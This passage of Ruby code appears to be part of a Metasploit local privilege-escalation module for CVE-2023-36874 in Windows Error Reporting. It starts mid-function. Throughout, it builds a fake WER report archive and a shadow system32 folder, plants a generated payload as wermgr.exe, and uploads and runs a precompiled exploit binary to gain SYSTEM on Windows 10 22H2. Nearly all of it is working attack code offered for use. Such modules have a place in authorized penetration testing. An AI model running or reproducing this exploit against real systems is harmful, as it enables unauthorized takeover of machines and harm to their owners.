mkdir(wer_archive_dir)
wer_archive_dir << 'WER\\'
mkdir(wer_archive_dir)
wer_archive_dir << 'ReportArchive\\'
mkdir(wer_archive_dir)
report_dir = "#{wer_archive_dir}#{datastore['REPORT_DIR']}"
mkdir(report_dir)
return report_dir
end
def upload_shadow_report(shadow_archive_dir)
report_filename = "#{shadow_archive_dir}\\Report.wer"
wer_report_data = exploit_data('CVE-2023-36874', 'Report.wer')
vprint_status("Writing bad Report to #{report_filename}")
write_file(report_filename, wer_report_data)
end
def build_shadow_system32(shadow_base_dir)
shadow_win32 = "#{shadow_base_dir}\\system32"
vprint_status("Creating #{shadow_win32}")
mkdir(shadow_win32)
return shadow_win32
end
def upload_payload(shadow_win32)
payload_bin = generate_payload_exe
payload_filename = "#{shadow_win32}\\wermgr.exe"
vprint_status("Writing payload to #{payload_filename}")
write_file(payload_filename, payload_bin)
end
def upload_execute_exploit(exploit_path, shadow_path, home_dir)
vprint_status("shadow_path = #{shadow_path}")
exploit_bin = exploit_data('CVE-2023-36874', 'CVE-2023-36874.exe')
write_file(exploit_path, exploit_bin)
sleep datastore['EXECUTE_DELAY']
vprint_status("Exploit uploaded to #{exploit_path}")
cmd = "#{exploit_path} #{shadow_path} #{home_dir} #{datastore['REPORT_DIR']}"
output = cmd_exec(cmd, nil, 30)
vprint_status(output)
end
def check
# This only appears to work on 22H2, but likely will work elsewhere if we figure out the function pointers.
version = get_version_info
vprint_status("OS version: #{version}")
return Exploit::CheckCode::Appears if version.build_number == Msf::WindowsVersion::Win10_22H2
return Exploit::CheckCode::Safe
end
def exploit
fail_with(Module::Failure::BadConfig, 'User cannot be local admin') if is_in_admin_group?
fail_with(Module::Failure::BadConfig, 'Already SYSTEM') if is_system?
shadow_dir = datastore['SHADOW_DRIVE']
home_dir = get_env('HOMEDRIVE')
shadow_path = "#{home_dir}\\#{shadow_dir}"
vprint_status("Shadow Path = #{shadow_path}")
upload_error_report
shadow_archive_dir = build_shadow_archive_dir(shadow_path.dup)
upload_shadow_report(shadow_archive_dir)
shadow_system32 = build_shadow_system32(shadow_path.dup)
upload_payload(shadow_system32)
sleep datastore['EXECUTE_DELAY']
exploit_path = "#{shadow_path}\\#{datastore['EXPLOIT_NAME']}"
exploit_path << '.exe' unless exploit_path[-4..] == '.exe'
if shadow_dir.length > 64
fail_with(Module::Failure::BadConfig, 'REPORT_DIR value too long')
end
upload_execute_exploit(exploit_path, shadow_dir, home_dir)
print_warning("Manual deletion of #{shadow_path} may be required")
end
end